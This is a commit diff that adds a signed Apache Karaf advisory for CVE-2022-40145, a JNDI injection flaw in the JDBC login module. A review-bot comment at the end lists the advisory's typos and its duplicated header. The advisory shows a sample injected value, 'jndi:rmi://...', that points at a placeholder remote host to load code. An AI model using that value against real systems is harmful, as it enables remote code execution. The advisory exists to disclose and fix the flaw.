Publish CVE-2022-40145 advisory notice
diff --git a/security/cve-2022-40145.txt b/security/cve-2022-40145.txt
new file mode 100644
index 0000000..fd29009
--- /dev/null
+++ b/security/cve-2022-40145.txt
@@ -0,0 +1,52 @@
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA512
+
+Hash: SHA512
+
+CVE-2022-40145: LDMP injection vulnerability in JDBC Login Module with JDK 8
+
+Severity: Low
+
+Vendor: The Apache Software Foundation
+
+Versions Affected: all versions of Apache Karaf prior to 4.3.8 or 4.4.2
+
+Description:
+
+The method org.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource
+uses InitialContext.lookup(jndiName) without filtering.
+User can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" +
+DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,
+"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup.
+
+This vulnerable to a remote code execution (RCE) attack when a
+configuration uses a JNDI LDAP data source URI when an attacker has
+control of the target LDAP server.
+
+This has been fixed in revision:
+
+https://gitbox.apache.org/repos/asf?p=karaf.git;h=3819f48341
+https://gitbox.apache.org/repos/asf?p=karaf.git;h=2a933445d1
+
+Mitigation: Apache Karaf users should upgrade to 4.3.8 or 4.4.2
+or later as soon as possible, or use correct path.
+
+JIRA Tickets: https://issues.apache.org/jira/browse/KARAF-7568
+
+Credit: This issue was discovered and reported by Xun Bai <bbbbear68@gmail.com>
+-----BEGIN PGP SIGNATURE-----
+
+iQIzBAEBCgAdFiEEGqjPktQJpzOT0Lc2v/LuQsgoLnYFAmOW/5wACgkQv/LuQsgo
+LnaRtBAApAsUA7+zVl03d0pKa7Dd41uec9/voRZ9DSf0byRNdP/NQslAe6ZHEbqz
+/2pC3OuYj0yfBOWZ6O0uFb/iDt4+GqAz3mnZqRyDq+hcrdBY5VVxkOU+6uRtQ+Sm
+GfkDmMpJDLOURgG/xQa/G8QhOLiBtBErwB5pffMBoxC12HjBPfichM6KJuT55MGR
+yvR6CXsPnAlRkyhYPSkI9ehng2BbgnqCHtFQEZwXTViXoyz44/0NZc6URlytsO11
+a3/qbkP1p8nvwC5U5D4P/RKRLvN23HZFbFRRms/gNN+L9BKmv8krA3ESnNgi7Kcj
+7j+8gRYRzw/g41GuZARC435zCy8PH9ydoHZQnicSmQUpDzBwfCBpRFgiXpq3ztHt
+7sLa3rSOVWiJmQiAjQXM1Rr958TrBYRjV2UcTbb0AYEEiZQrAeYHq1M5Y+3pcV9h
+NsqEeVkDZji0nu1EoTbxcjIJjMo1G8u3k8VvKMAfrQ37gnCfOnKYYak47cwvZzmu
+suatXXUQffi/YR3wercn/1AyCqYmWPbrcvI2b41eDR5JtDX6OMtRdsshCVwjEh9v
+k2FSoPCM21+lpbXful4LwIMUppNfwrvn4VXsAsWG4I/g8kxbrFbI0Y/cJHPuCbU2
+ABpIBEZGXh8h8TMIimM7EGkKIiF2rlohKsavtgYoi91qrpmca70=
+=ozdD
+-----END PGP SIGNATURE-----
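Review bot: the signed cleartext in this hunk carries a duplicated armor header ("Hash: SHA512" appears at both the second and fourth lines of the file) and several wording errors that the advisory should not ship with: the title reads "LDMP injection" where the body describes a JNDI LDAP data source URI, the package path "org.apache.karaf.jass.modules.jdbc" looks like a typo for the JAAS module package, "This vulnerable to a remote code execution" is missing "is", and the mitigation "or use correct path" does not tell users what a correct value looks like (the surrounding text suggests keeping the "osgi:" DataSource lookup rather than a remote "jndi:" URI). Because the block is a PGP clearsigned message, none of these can be corrected in place without invalidating the signature; suggest fixing the text, re-signing once, and committing the regenerated file in a single change.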